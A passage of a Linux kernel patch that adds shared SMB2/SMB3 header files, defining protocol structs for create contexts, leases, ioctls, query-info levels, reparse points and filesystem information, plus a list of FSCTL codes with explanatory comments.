++#define SMB2_CREATE_APP_INSTANCE_VERSION "\xB9\x82\xD0\xB7\x3B\x56\x07\x4F\xA0\x7B\x52\x4A\x81\x16\xA0\x10"
++#define SVHDX_OPEN_DEVICE_CONTEXT	"\x9C\xCB\xCF\x9E\x04\xC1\xE6\x43\x98\x0E\x15\x8D\xA1\xF6\xEC\x83"
++#define SMB2_CREATE_TAG_AAPL			"AAPL"
++
++/* Flag (SMB3 open response) values */
++#define SMB2_CREATE_FLAG_REPARSEPOINT 0x01
++
++struct create_context {
++	__le32 Next;
++	__le16 NameOffset;
++	__le16 NameLength;
++	__le16 Reserved;
++	__le16 DataOffset;
++	__le32 DataLength;
++	__u8 Buffer[];
++} __packed;
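++
++/*
++ * Illustrative sketch (hypothetical helper; assumes offsets were already
++ * bounds-checked): create contexts chain via Next, the 8-byte-aligned
++ * offset from the start of this context to the next one, 0 for the last.
++ *
++ *	static inline struct create_context *
++ *	next_create_context(struct create_context *cc)
++ *	{
++ *		u32 next = le32_to_cpu(cc->Next);
++ *
++ *		return next ? (struct create_context *)((u8 *)cc + next) : NULL;
++ *	}
++ */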
++
++struct smb2_create_req {
++	struct smb2_hdr hdr;
++	__le16 StructureSize;	/* Must be 57 */
++	__u8   SecurityFlags;
++	__u8   RequestedOplockLevel;
++	__le32 ImpersonationLevel;
++	__le64 SmbCreateFlags;
++	__le64 Reserved;
++	__le32 DesiredAccess;
++	__le32 FileAttributes;
++	__le32 ShareAccess;
++	__le32 CreateDisposition;
++	__le32 CreateOptions;
++	__le16 NameOffset;
++	__le16 NameLength;
++	__le32 CreateContextsOffset;
++	__le32 CreateContextsLength;
++	__u8   Buffer[];
++} __packed;
++
++struct smb2_create_rsp {
++	struct smb2_hdr hdr;
++	__le16 StructureSize;	/* Must be 89 */
++	__u8   OplockLevel;
++	__u8   Flags;  /* 0x01 if reparse point */
++	__le32 CreateAction;
++	__le64 CreationTime;
++	__le64 LastAccessTime;
++	__le64 LastWriteTime;
++	__le64 ChangeTime;
++	__le64 AllocationSize;
++	__le64 EndofFile;
++	__le32 FileAttributes;
++	__le32 Reserved2;
++	__u64  PersistentFileId;
++	__u64  VolatileFileId;
++	__le32 CreateContextsOffset;
++	__le32 CreateContextsLength;
++	__u8   Buffer[1];
++} __packed;
++
++struct create_posix {
++	struct create_context ccontext;
++	__u8    Name[16];
++	__le32  Mode;
++	__u32   Reserved;
++} __packed;
++
++#define SMB2_LEASE_NONE_LE			cpu_to_le32(0x00)
++#define SMB2_LEASE_READ_CACHING_LE		cpu_to_le32(0x01)
++#define SMB2_LEASE_HANDLE_CACHING_LE		cpu_to_le32(0x02)
++#define SMB2_LEASE_WRITE_CACHING_LE		cpu_to_le32(0x04)
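++/* The caching states combine; e.g. a full "RWH" lease is READ | WRITE | HANDLE */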
++
++#define SMB2_LEASE_FLAG_BREAK_IN_PROGRESS_LE	cpu_to_le32(0x02)
++
++#define SMB2_LEASE_KEY_SIZE			16
++
++struct lease_context {
++	__u8 LeaseKey[SMB2_LEASE_KEY_SIZE];
++	__le32 LeaseState;
++	__le32 LeaseFlags;
++	__le64 LeaseDuration;
++} __packed;
++
++struct lease_context_v2 {
++	__u8 LeaseKey[SMB2_LEASE_KEY_SIZE];
++	__le32 LeaseState;
++	__le32 LeaseFlags;
++	__le64 LeaseDuration;
++	__u8 ParentLeaseKey[SMB2_LEASE_KEY_SIZE];
++	__le16 Epoch;
++	__le16 Reserved;
++} __packed;
++
++struct create_lease {
++	struct create_context ccontext;
++	__u8   Name[8];
++	struct lease_context lcontext;
++} __packed;
++
++struct create_lease_v2 {
++	struct create_context ccontext;
++	__u8   Name[8];
++	struct lease_context_v2 lcontext;
++	__u8   Pad[4];
++} __packed;
++
++/* See MS-SMB2 2.2.31 and 2.2.32 */
++struct smb2_ioctl_req {
++	struct smb2_hdr hdr;
++	__le16 StructureSize; /* Must be 57 */
++	__le16 Reserved;
++	__le32 CtlCode;
++	__u64  PersistentFileId;
++	__u64  VolatileFileId;
++	__le32 InputOffset; /* offset from start of SMB2 header to input buffer */
++	__le32 InputCount;
++	__le32 MaxInputResponse;
++	__le32 OutputOffset;
++	__le32 OutputCount;
++	__le32 MaxOutputResponse;
++	__le32 Flags;
++	__le32 Reserved2;
++	__u8   Buffer[];
++} __packed;
++
++struct smb2_ioctl_rsp {
++	struct smb2_hdr hdr;
++	__le16 StructureSize; /* Must be 49 */
++	__le16 Reserved;
++	__le32 CtlCode;
++	__u64  PersistentFileId;
++	__u64  VolatileFileId;
++	__le32 InputOffset; /* offset from start of SMB2 header to input buffer */
++	__le32 InputCount;
++	__le32 OutputOffset;
++	__le32 OutputCount;
++	__le32 Flags;
++	__le32 Reserved2;
++	__u8   Buffer[];
++} __packed;
++
++/* this goes in the ioctl buffer when doing FSCTL_SET_ZERO_DATA */
++struct file_zero_data_information {
++	__le64	FileOffset;
++	__le64	BeyondFinalZero;
++} __packed;
++
++/* See MS-FSCC 2.3.7 */
++struct duplicate_extents_to_file {
++	__u64 PersistentFileHandle; /* source file handle, opaque endianness */
++	__u64 VolatileFileHandle;
++	__le64 SourceFileOffset;
++	__le64 TargetFileOffset;
++	__le64 ByteCount;  /* Bytes to be copied */
++} __packed;
++
++/* See MS-FSCC 2.3.8 */
++#define DUPLICATE_EXTENTS_DATA_EX_SOURCE_ATOMIC	0x00000001
++struct duplicate_extents_to_file_ex {
++	__u64 PersistentFileHandle; /* source file handle, opaque endianness */
++	__u64 VolatileFileHandle;
++	__le64 SourceFileOffset;
++	__le64 TargetFileOffset;
++	__le64 ByteCount;  /* Bytes to be copied */
++	__le32 Flags;
++	__le32 Reserved;
++} __packed;
++
++
++/* See MS-FSCC 2.3.20 */
++struct fsctl_get_integrity_information_rsp {
++	__le16	ChecksumAlgorithm;
++	__le16	Reserved;
++	__le32	Flags;
++	__le32	ChecksumChunkSizeInBytes;
++	__le32	ClusterSizeInBytes;
++} __packed;
++
++/* See MS-FSCC 2.3.55 */
++struct fsctl_query_file_regions_req {
++	__le64	FileOffset;
++	__le64	Length;
++	__le32	DesiredUsage;
++	__le32	Reserved;
++} __packed;
++
++/* DesiredUsage flags see MS-FSCC 2.3.56.1 */
++#define FILE_USAGE_INVALID_RANGE	0x00000000
++#define FILE_USAGE_VALID_CACHED_DATA	0x00000001
++#define FILE_USAGE_NONCACHED_DATA	0x00000002
++
++struct file_region_info {
++	__le64	FileOffset;
++	__le64	Length;
++	__le32	DesiredUsage;
++	__le32	Reserved;
++} __packed;
++
++/* See MS-FSCC 2.3.56 */
++struct fsctl_query_file_region_rsp {
++	__le32 Flags;
++	__le32 TotalRegionEntryCount;
++	__le32 RegionEntryCount;
++	__u32  Reserved;
++	struct  file_region_info Regions[];
++} __packed;
++
++/* See MS-FSCC 2.3.58 */
++struct fsctl_query_on_disk_vol_info_rsp {
++	__le64	DirectoryCount;
++	__le64	FileCount;
++	__le16	FsFormatMajVersion;
++	__le16	FsFormatMinVersion;
++	__u8	FsFormatName[24];
++	__le64	FormatTime;
++	__le64	LastUpdateTime;
++	__u8	CopyrightInfo[68];
++	__u8	AbstractInfo[68];
++	__u8	FormatImplInfo[68];
++	__u8	LastModifyImplInfo[68];
++} __packed;
++
++/* See MS-FSCC 2.3.73 */
++struct fsctl_set_integrity_information_req {
++	__le16	ChecksumAlgorithm;
++	__le16	Reserved;
++	__le32	Flags;
++} __packed;
++
++/* See MS-FSCC 2.3.75 */
++struct fsctl_set_integrity_info_ex_req {
++	__u8	EnableIntegrity;
++	__u8	KeepState;
++	__u16	Reserved;
++	__le32	Flags;
++	__u8	Version;
++	__u8	Reserved2[7];
++} __packed;
++
++/* Integrity ChecksumAlgorithm choices for above */
++#define	CHECKSUM_TYPE_NONE	0x0000
++#define	CHECKSUM_TYPE_CRC64	0x0002
++#define	CHECKSUM_TYPE_UNCHANGED	0xFFFF	/* set only */
++
++/* Integrity flags for above */
++#define FSCTL_INTEGRITY_FLAG_CHECKSUM_ENFORCEMENT_OFF	0x00000001
++
++/* Reparse structures - see MS-FSCC 2.1.2 */
++
++/* struct fsctl_reparse_info_req is empty, only response structs (see below) */
++struct reparse_data_buffer {
++	__le32	ReparseTag;
++	__le16	ReparseDataLength;
++	__u16	Reserved;
++	__u8	DataBuffer[]; /* Variable Length */
++} __packed;
++
++struct reparse_guid_data_buffer {
++	__le32	ReparseTag;
++	__le16	ReparseDataLength;
++	__u16	Reserved;
++	__u8	ReparseGuid[16];
++	__u8	DataBuffer[]; /* Variable Length */
++} __packed;
++
++struct reparse_mount_point_data_buffer {
++	__le32	ReparseTag;
++	__le16	ReparseDataLength;
++	__u16	Reserved;
++	__le16	SubstituteNameOffset;
++	__le16	SubstituteNameLength;
++	__le16	PrintNameOffset;
++	__le16	PrintNameLength;
++	__u8	PathBuffer[]; /* Variable Length */
++} __packed;
++
++#define SYMLINK_FLAG_RELATIVE 0x00000001
++
++struct reparse_symlink_data_buffer {
++	__le32	ReparseTag;
++	__le16	ReparseDataLength;
++	__u16	Reserved;
++	__le16	SubstituteNameOffset;
++	__le16	SubstituteNameLength;
++	__le16	PrintNameOffset;
++	__le16	PrintNameLength;
++	__le32	Flags;
++	__u8	PathBuffer[]; /* Variable Length */
++} __packed;
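++
++/*
++ * The *NameOffset/*NameLength pairs above are byte offsets and lengths of
++ * UTF-16LE strings within PathBuffer. For example, a symlink whose
++ * substitute name is "target" and which carries no separate print name has
++ * SubstituteNameOffset 0, SubstituteNameLength 12, PrintNameOffset 12 and
++ * PrintNameLength 0.
++ */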
++
++/* See MS-FSCC 2.1.2.6 and cifspdu.h for struct reparse_posix_data */
++
++struct validate_negotiate_info_req {
++	__le32 Capabilities;
++	__u8   Guid[SMB2_CLIENT_GUID_SIZE];
++	__le16 SecurityMode;
++	__le16 DialectCount;
++	__le16 Dialects[4]; /* BB expand this if autonegotiate > 4 dialects */
++} __packed;
++
++struct validate_negotiate_info_rsp {
++	__le32 Capabilities;
++	__u8   Guid[SMB2_CLIENT_GUID_SIZE];
++	__le16 SecurityMode;
++	__le16 Dialect; /* Dialect in use for the connection */
++} __packed;
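++
++/*
++ * The two structs above ride in FSCTL_VALIDATE_NEGOTIATE_INFO, sent over a
++ * signed ioctl after tree connect; the server echoes the negotiated values
++ * so the client can detect a tampered (downgraded) negotiate exchange.
++ */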
++
++
++/* Possible InfoType values */
++#define SMB2_O_INFO_FILE	0x01
++#define SMB2_O_INFO_FILESYSTEM	0x02
++#define SMB2_O_INFO_SECURITY	0x03
++#define SMB2_O_INFO_QUOTA	0x04
++
++/* SMB2 Query Info see MS-SMB2 (2.2.37) or MS-DTYP */
++
++/* List of QUERY INFO levels (those also valid for QUERY_DIR are noted below) */
++#define FILE_DIRECTORY_INFORMATION	1	/* also for QUERY_DIR */
++#define FILE_FULL_DIRECTORY_INFORMATION 2	/* also for QUERY_DIR */
++#define FILE_BOTH_DIRECTORY_INFORMATION 3	/* also for QUERY_DIR */
++#define FILE_BASIC_INFORMATION		4
++#define FILE_STANDARD_INFORMATION	5
++#define FILE_INTERNAL_INFORMATION	6
++#define FILE_EA_INFORMATION	        7
++#define FILE_ACCESS_INFORMATION		8
++#define FILE_NAME_INFORMATION		9
++#define FILE_RENAME_INFORMATION		10
++#define FILE_LINK_INFORMATION		11
++#define FILE_NAMES_INFORMATION		12	/* also for QUERY_DIR */
++#define FILE_DISPOSITION_INFORMATION	13
++#define FILE_POSITION_INFORMATION	14
++#define FILE_FULL_EA_INFORMATION	15
++#define FILE_MODE_INFORMATION		16
++#define FILE_ALIGNMENT_INFORMATION	17
++#define FILE_ALL_INFORMATION		18
++#define FILE_ALLOCATION_INFORMATION	19
++#define FILE_END_OF_FILE_INFORMATION	20
++#define FILE_ALTERNATE_NAME_INFORMATION 21
++#define FILE_STREAM_INFORMATION		22
++#define FILE_PIPE_INFORMATION		23
++#define FILE_PIPE_LOCAL_INFORMATION	24
++#define FILE_PIPE_REMOTE_INFORMATION	25
++#define FILE_MAILSLOT_QUERY_INFORMATION 26
++#define FILE_MAILSLOT_SET_INFORMATION	27
++#define FILE_COMPRESSION_INFORMATION	28
++#define FILE_OBJECT_ID_INFORMATION	29
++/* Number 30 not defined in documents */
++#define FILE_MOVE_CLUSTER_INFORMATION	31
++#define FILE_QUOTA_INFORMATION		32
++#define FILE_REPARSE_POINT_INFORMATION	33
++#define FILE_NETWORK_OPEN_INFORMATION	34
++#define FILE_ATTRIBUTE_TAG_INFORMATION	35
++#define FILE_TRACKING_INFORMATION	36
++#define FILEID_BOTH_DIRECTORY_INFORMATION 37	/* also for QUERY_DIR */
++#define FILEID_FULL_DIRECTORY_INFORMATION 38	/* also for QUERY_DIR */
++#define FILE_VALID_DATA_LENGTH_INFORMATION 39
++#define FILE_SHORT_NAME_INFORMATION	40
++#define FILE_SFIO_RESERVE_INFORMATION	44
++#define FILE_SFIO_VOLUME_INFORMATION	45
++#define FILE_HARD_LINK_INFORMATION	46
++#define FILE_NORMALIZED_NAME_INFORMATION 48
++#define FILEID_GLOBAL_TX_DIRECTORY_INFORMATION 50
++#define FILE_STANDARD_LINK_INFORMATION	54
++#define FILE_ID_INFORMATION		59
++#define FILE_ID_EXTD_DIRECTORY_INFORMATION 60	/* also for QUERY_DIR */
++/* Used for Query Info and Find File POSIX Info for SMB3.1.1 and SMB1 */
++#define SMB_FIND_FILE_POSIX_INFO	0x064
++
++/* Security info type AdditionalInformation flags. */
++#define OWNER_SECINFO   0x00000001
++#define GROUP_SECINFO   0x00000002
++#define DACL_SECINFO   0x00000004
++#define SACL_SECINFO   0x00000008
++#define LABEL_SECINFO   0x00000010
++#define ATTRIBUTE_SECINFO   0x00000020
++#define SCOPE_SECINFO   0x00000040
++#define BACKUP_SECINFO   0x00010000
++#define UNPROTECTED_SACL_SECINFO   0x10000000
++#define UNPROTECTED_DACL_SECINFO   0x20000000
++#define PROTECTED_SACL_SECINFO   0x40000000
++#define PROTECTED_DACL_SECINFO   0x80000000
++
++/* Flags used for FileFullEAinfo */
++#define SL_RESTART_SCAN		0x00000001
++#define SL_RETURN_SINGLE_ENTRY	0x00000002
++#define SL_INDEX_SPECIFIED	0x00000004
++
++struct smb2_query_info_req {
++	struct smb2_hdr hdr;
++	__le16 StructureSize; /* Must be 41 */
++	__u8   InfoType;
++	__u8   FileInfoClass;
++	__le32 OutputBufferLength;
++	__le16 InputBufferOffset;
++	__u16  Reserved;
++	__le32 InputBufferLength;
++	__le32 AdditionalInformation;
++	__le32 Flags;
++	__u64  PersistentFileId;
++	__u64  VolatileFileId;
++	__u8   Buffer[1];
++} __packed;
++
++struct smb2_query_info_rsp {
++	struct smb2_hdr hdr;
++	__le16 StructureSize; /* Must be 9 */
++	__le16 OutputBufferOffset;
++	__le32 OutputBufferLength;
++	__u8   Buffer[1];
++} __packed;
++
++/*
++ *	PDU query infolevel structure definitions
++ */
++
++/* See MS-FSCC 2.3.52 */
++struct file_allocated_range_buffer {
++	__le64	file_offset;
++	__le64	length;
++} __packed;
++
++struct smb2_file_internal_info {
++	__le64 IndexNumber;
++} __packed; /* level 6 Query */
++
++struct smb2_file_rename_info { /* encoding of request for level 10 */
++	__u8   ReplaceIfExists; /* 1 = replace existing target with new */
++				/* 0 = fail if target already exists */
++	__u8   Reserved[7];
++	__u64  RootDirectory;  /* MBZ for network operations (per spec, though why is unclear) */
++	__le32 FileNameLength;
++	char   FileName[];     /* New name to be assigned */
++	/* padding - overall struct size must be >= 24 so filename + pad >= 6 */
++} __packed; /* level 10 Set */
++
++struct smb2_file_link_info { /* encoding of request for level 11 */
++	__u8   ReplaceIfExists; /* 1 = replace existing link with new */
++				/* 0 = fail if link already exists */
++	__u8   Reserved[7];
++	__u64  RootDirectory;  /* MBZ for network operations (per spec, though why is unclear) */
++	__le32 FileNameLength;
++	char   FileName[];     /* Name to be assigned to new link */
++} __packed; /* level 11 Set */
++
++/*
++ * This level 18 struct, although it has the same name, is different from the
++ * cifs level 0x107 struct. Level 0x107 has an extra u64 between AccessFlags and
++ * CurrentByteOffset.
++ */
++struct smb2_file_all_info { /* data block encoding of response to level 18 */
++	__le64 CreationTime;	/* Beginning of FILE_BASIC_INFO equivalent */
++	__le64 LastAccessTime;
++	__le64 LastWriteTime;
++	__le64 ChangeTime;
++	__le32 Attributes;
++	__u32  Pad1;		/* End of FILE_BASIC_INFO equivalent */
++	__le64 AllocationSize;	/* Beginning of FILE_STANDARD_INFO equivalent */
++	__le64 EndOfFile;	/* size, i.e. offset to first free byte in file */
++	__le32 NumberOfLinks;	/* hard links */
++	__u8   DeletePending;
++	__u8   Directory;
++	__u16  Pad2;		/* End of FILE_STANDARD_INFO equivalent */
++	__le64 IndexNumber;
++	__le32 EASize;
++	__le32 AccessFlags;
++	__le64 CurrentByteOffset;
++	__le32 Mode;
++	__le32 AlignmentRequirement;
++	__le32 FileNameLength;
++	char   FileName[1];
++} __packed; /* level 18 Query */
++
++struct smb2_file_eof_info { /* encoding of request for level 20 */
++	__le64 EndOfFile; /* new end of file value */
++} __packed; /* level 20 Set */
++
++/* Level 100 query info */
++struct smb311_posix_qinfo {
++	__le64 CreationTime;
++	__le64 LastAccessTime;
++	__le64 LastWriteTime;
++	__le64 ChangeTime;
++	__le64 EndOfFile;
++	__le64 AllocationSize;
++	__le32 DosAttributes;
++	__le64 Inode;
++	__le32 DeviceId;
++	__le32 Zero;
++	/* beginning of POSIX Create Context Response */
++	__le32 HardLinks;
++	__le32 ReparseTag;
++	__le32 Mode;
++	u8     Sids[];
++	/*
++	 * var sized owner SID
++	 * var sized group SID
++	 * le32 filenamelength
++	 * u8  filename[]
++	 */
++} __packed;
++
++/* File System Information Classes */
++#define FS_VOLUME_INFORMATION		1 /* Query */
++#define FS_LABEL_INFORMATION		2 /* Set */
++#define FS_SIZE_INFORMATION		3 /* Query */
++#define FS_DEVICE_INFORMATION		4 /* Query */
++#define FS_ATTRIBUTE_INFORMATION	5 /* Query */
++#define FS_CONTROL_INFORMATION		6 /* Query, Set */
++#define FS_FULL_SIZE_INFORMATION	7 /* Query */
++#define FS_OBJECT_ID_INFORMATION	8 /* Query, Set */
++#define FS_DRIVER_PATH_INFORMATION	9 /* Query */
++#define FS_SECTOR_SIZE_INFORMATION	11 /* SMB3 or later. Query */
++#define FS_POSIX_INFORMATION		100 /* SMB3.1.1 POSIX. Query */
++
++struct smb2_fs_full_size_info {
++	__le64 TotalAllocationUnits;
++	__le64 CallerAvailableAllocationUnits;
++	__le64 ActualAvailableAllocationUnits;
++	__le32 SectorsPerAllocationUnit;
++	__le32 BytesPerSector;
++} __packed;
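++
++/*
++ * Sizes above are in allocation units; e.g. the bytes available to the
++ * caller work out as:
++ *
++ *	CallerAvailableAllocationUnits * SectorsPerAllocationUnit *
++ *		BytesPerSector
++ */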
++
++#define SSINFO_FLAGS_ALIGNED_DEVICE		0x00000001
++#define SSINFO_FLAGS_PARTITION_ALIGNED_ON_DEVICE 0x00000002
++#define SSINFO_FLAGS_NO_SEEK_PENALTY		0x00000004
++#define SSINFO_FLAGS_TRIM_ENABLED		0x00000008
++
++/* sector size info struct */
++struct smb3_fs_ss_info {
++	__le32 LogicalBytesPerSector;
++	__le32 PhysicalBytesPerSectorForAtomicity;
++	__le32 PhysicalBytesPerSectorForPerf;
++	__le32 FSEffPhysicalBytesPerSectorForAtomicity;
++	__le32 Flags;
++	__le32 ByteOffsetForSectorAlignment;
++	__le32 ByteOffsetForPartitionAlignment;
++} __packed;
++
++/* File System Control Information */
++struct smb2_fs_control_info {
++	__le64 FreeSpaceStartFiltering;
++	__le64 FreeSpaceThreshold;
++	__le64 FreeSpaceStopFiltering;
++	__le64 DefaultQuotaThreshold;
++	__le64 DefaultQuotaLimit;
++	__le32 FileSystemControlFlags;
++	__le32 Padding;
++} __packed;
++
++/* volume info struct - see MS-FSCC 2.5.9 */
++#define MAX_VOL_LABEL_LEN	32
++struct smb3_fs_vol_info {
++	__le64	VolumeCreationTime;
++	__u32	VolumeSerialNumber;
++	__le32	VolumeLabelLength; /* includes trailing null */
++	__u8	SupportsObjects; /* True if the fs, e.g. NTFS, supports objects */
++	__u8	Reserved;
++	__u8	VolumeLabel[]; /* variable len */
++} __packed;
++
++/* See MS-SMB2 2.2.23 through 2.2.25 */
++struct smb2_oplock_break {
++	struct smb2_hdr hdr;
++	__le16 StructureSize; /* Must be 24 */
++	__u8   OplockLevel;
++	__u8   Reserved;
++	__le32 Reserved2;
++	__u64  PersistentFid;
++	__u64  VolatileFid;
++} __packed;
++
++#define SMB2_NOTIFY_BREAK_LEASE_FLAG_ACK_REQUIRED cpu_to_le32(0x01)
++
++struct smb2_lease_break {
++	struct smb2_hdr hdr;
++	__le16 StructureSize; /* Must be 44 */
++	__le16 Epoch;
++	__le32 Flags;
++	__u8   LeaseKey[16];
++	__le32 CurrentLeaseState;
++	__le32 NewLeaseState;
++	__le32 BreakReason;
++	__le32 AccessMaskHint;
++	__le32 ShareMaskHint;
++} __packed;
++
++struct smb2_lease_ack {
++	struct smb2_hdr hdr;
++	__le16 StructureSize; /* Must be 36 */
++	__le16 Reserved;
++	__le32 Flags;
++	__u8   LeaseKey[16];
++	__le32 LeaseState;
++	__le64 LeaseDuration;
++} __packed;
++
++#define OP_BREAK_STRUCT_SIZE_20		24
++#define OP_BREAK_STRUCT_SIZE_21		36
++#endif				/* _COMMON_SMB2PDU_H */
+diff --git a/fs/smb/common/smbfsctl.h b/fs/smb/common/smbfsctl.h
+new file mode 100644
+index 0000000000000..edd7fc2a7921b
+--- /dev/null
++++ b/fs/smb/common/smbfsctl.h
+@@ -0,0 +1,170 @@
++/* SPDX-License-Identifier: LGPL-2.1+ */
++/*
++ *   SMB, CIFS, SMB2 FSCTL definitions
++ *
++ *   Copyright (c) International Business Machines  Corp., 2002,2013
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ */
++
++/* IOCTL information */
++/*
++ * List of ioctl/fsctl function codes that are, or could be, useful in the
++ * future to remote clients like the cifs or SMB2/SMB3 clients.  This is
++ * probably a slightly larger set of fsctls than the local NTFS filesystem
++ * could handle, including the seven below that we do not have struct
++ * definitions for.  Even with protocol definitions for most of these now
++ * available, we still need to do some experimentation to identify which are
++ * practical to do remotely.  Some of the following, such as the
++ * encryption/compression ones, could be invoked from tools via a specialized
++ * hook into the VFS rather than via the standard vfs entry points.
++ *
++ * See MS-SMB2 Section 2.2.31 (last checked September 2021; all of that list
++ * is below). Additional detail on less common ones can be found in MS-FSCC
++ * section 2.3.
++ */
++
++#ifndef __SMBFSCTL_H
++#define __SMBFSCTL_H
++
++/*
++ * FSCTL values are 32 bits and are constructed as
++ * <device 16bits> <access 2bits> <function 12bits> <method 2bits>
++ */
++/* Device */
++#define FSCTL_DEVICE_DFS                 (0x0006 << 16)
++#define FSCTL_DEVICE_FILE_SYSTEM         (0x0009 << 16)
++#define FSCTL_DEVICE_NAMED_PIPE          (0x0011 << 16)
++#define FSCTL_DEVICE_NETWORK_FILE_SYSTEM (0x0014 << 16)
++#define FSCTL_DEVICE_MASK                0xffff0000
++/* Access */
++#define FSCTL_DEVICE_ACCESS_FILE_ANY_ACCESS        (0x00 << 14)
++#define FSCTL_DEVICE_ACCESS_FILE_READ_ACCESS       (0x01 << 14)
++#define FSCTL_DEVICE_ACCESS_FILE_WRITE_ACCESS      (0x02 << 14)
++#define FSCTL_DEVICE_ACCESS_FILE_READ_WRITE_ACCESS (0x03 << 14)
++#define FSCTL_DEVICE_ACCESS_MASK                   0x0000c000
++/* Function */
++#define FSCTL_DEVICE_FUNCTION_MASK       0x00003ffc
++/* Method */
++#define FSCTL_DEVICE_METHOD_BUFFERED   0x00
++#define FSCTL_DEVICE_METHOD_IN_DIRECT  0x01
++#define FSCTL_DEVICE_METHOD_OUT_DIRECT 0x02
++#define FSCTL_DEVICE_METHOD_NEITHER    0x03
++#define FSCTL_DEVICE_METHOD_MASK       0x00000003
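++
++/*
++ * Illustrative decomposition (hypothetical helpers, not part of the
++ * protocol headers): e.g. FSCTL_VALIDATE_NEGOTIATE_INFO (0x00140204) is
++ * device 0x0014 (network file system), any access, function 0x081,
++ * method 0 (buffered).
++ *
++ *	static inline u32 fsctl_device(u32 fsctl)
++ *	{
++ *		return (fsctl & FSCTL_DEVICE_MASK) >> 16;
++ *	}
++ *
++ *	static inline u32 fsctl_function(u32 fsctl)
++ *	{
++ *		return (fsctl & FSCTL_DEVICE_FUNCTION_MASK) >> 2;
++ *	}
++ */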
++
++
++#define FSCTL_DFS_GET_REFERRALS      0x00060194
++#define FSCTL_DFS_GET_REFERRALS_EX   0x000601B0
++#define FSCTL_REQUEST_OPLOCK_LEVEL_1 0x00090000
++#define FSCTL_REQUEST_OPLOCK_LEVEL_2 0x00090004
++#define FSCTL_REQUEST_BATCH_OPLOCK   0x00090008
++#define FSCTL_LOCK_VOLUME            0x00090018
++#define FSCTL_UNLOCK_VOLUME          0x0009001C
++#define FSCTL_IS_PATHNAME_VALID      0x0009002C /* BB add struct */
++#define FSCTL_GET_COMPRESSION        0x0009003C /* BB add struct */
++#define FSCTL_SET_COMPRESSION        0x0009C040 /* BB add struct */
++#define FSCTL_QUERY_FAT_BPB          0x00090058 /* BB add struct */
++/* Verify the next FSCTL number; we had it as 0x00090090 before */
++#define FSCTL_FILESYSTEM_GET_STATS   0x00090060 /* BB add struct */
++#define FSCTL_GET_NTFS_VOLUME_DATA   0x00090064 /* BB add struct */
++#define FSCTL_GET_RETRIEVAL_POINTERS 0x00090073 /* BB add struct */
++#define FSCTL_IS_VOLUME_DIRTY        0x00090078 /* BB add struct */
++#define FSCTL_ALLOW_EXTENDED_DASD_IO 0x00090083 /* BB add struct */
++#define FSCTL_REQUEST_FILTER_OPLOCK  0x0009008C
++#define FSCTL_FIND_FILES_BY_SID      0x0009008F /* BB add struct */
++#define FSCTL_SET_OBJECT_ID          0x00090098 /* BB add struct */
++#define FSCTL_GET_OBJECT_ID          0x0009009C /* BB add struct */
++#define FSCTL_DELETE_OBJECT_ID       0x000900A0 /* BB add struct */
++#define FSCTL_SET_REPARSE_POINT      0x000900A4 /* BB add struct */
++#define FSCTL_GET_REPARSE_POINT      0x000900A8 /* BB add struct */
++#define FSCTL_DELETE_REPARSE_POINT   0x000900AC /* BB add struct */
++#define FSCTL_SET_OBJECT_ID_EXTENDED 0x000900BC /* BB add struct */
++#define FSCTL_CREATE_OR_GET_OBJECT_ID 0x000900C0 /* BB add struct */
++#define FSCTL_SET_SPARSE             0x000900C4 /* BB add struct */
++#define FSCTL_SET_ZERO_DATA          0x000980C8
++#define FSCTL_SET_ENCRYPTION         0x000900D7 /* BB add struct */
++#define FSCTL_ENCRYPTION_FSCTL_IO    0x000900DB /* BB add struct */
++#define FSCTL_WRITE_RAW_ENCRYPTED    0x000900DF /* BB add struct */
++#define FSCTL_READ_RAW_ENCRYPTED     0x000900E3 /* BB add struct */
++#define FSCTL_READ_FILE_USN_DATA     0x000900EB /* BB add struct */
++#define FSCTL_WRITE_USN_CLOSE_RECORD 0x000900EF /* BB add struct */
++#define FSCTL_MARK_HANDLE	     0x000900FC /* BB add struct */
++#define FSCTL_SIS_COPYFILE           0x00090100 /* BB add struct */
++#define FSCTL_RECALL_FILE            0x00090117 /* BB add struct */
++#define FSCTL_QUERY_SPARING_INFO     0x00090138 /* BB add struct */
++#define FSCTL_QUERY_ON_DISK_VOLUME_INFO 0x0009013C
++#define FSCTL_SET_ZERO_ON_DEALLOC    0x00090194 /* BB add struct */
++#define FSCTL_SET_SHORT_NAME_BEHAVIOR 0x000901B4 /* BB add struct */
++#define FSCTL_GET_INTEGRITY_INFORMATION 0x0009027C
++#define FSCTL_QUERY_FILE_REGIONS     0x00090284
++#define FSCTL_GET_REFS_VOLUME_DATA   0x000902D8 /* See MS-FSCC 2.3.24 */
++#define FSCTL_SET_INTEGRITY_INFORMATION_EXT 0x00090380
++#define FSCTL_GET_RETRIEVAL_POINTERS_AND_REFCOUNT 0x000903D3
++#define FSCTL_GET_RETRIEVAL_POINTER_COUNT 0x0009042B
++#define FSCTL_REFS_STREAM_SNAPSHOT_MANAGEMENT 0x00090440
++#define FSCTL_QUERY_ALLOCATED_RANGES 0x000940CF
++#define FSCTL_OFFLOAD_READ	0x00094264 /* BB add struct */
++#define FSCTL_OFFLOAD_WRITE	0x00098268 /* BB add struct */
++#define FSCTL_SET_DEFECT_MANAGEMENT  0x00098134 /* BB add struct */
++#define FSCTL_FILE_LEVEL_TRIM        0x00098208 /* BB add struct */
++#define FSCTL_DUPLICATE_EXTENTS_TO_FILE 0x00098344
++#define FSCTL_DUPLICATE_EXTENTS_TO_FILE_EX 0x000983E8
++#define FSCTL_SIS_LINK_FILES         0x0009C104
++#define FSCTL_SET_INTEGRITY_INFORMATION 0x0009C280
++#define FSCTL_PIPE_PEEK              0x0011400C /* BB add struct */
++#define FSCTL_PIPE_TRANSCEIVE        0x0011C017 /* BB add struct */
++/* strange that the number for this op is not sequential with the previous op */
++#define FSCTL_PIPE_WAIT              0x00110018 /* BB add struct */
++/* Enumerate previous versions of a file */
++#define FSCTL_SRV_ENUMERATE_SNAPSHOTS 0x00144064
++/* Retrieve an opaque file reference for server-side data movement, i.e. copy */
++#define FSCTL_SRV_REQUEST_RESUME_KEY 0x00140078
++#define FSCTL_LMR_REQUEST_RESILIENCY 0x001401D4
++#define FSCTL_LMR_GET_LINK_TRACK_INF 0x001400E8 /* BB add struct */
++#define FSCTL_LMR_SET_LINK_TRACK_INF 0x001400EC /* BB add struct */
++#define FSCTL_VALIDATE_NEGOTIATE_INFO 0x00140204
++/* Perform server-side data movement */
++#define FSCTL_SRV_COPYCHUNK 0x001440F2
++#define FSCTL_SRV_COPYCHUNK_WRITE 0x001480F2
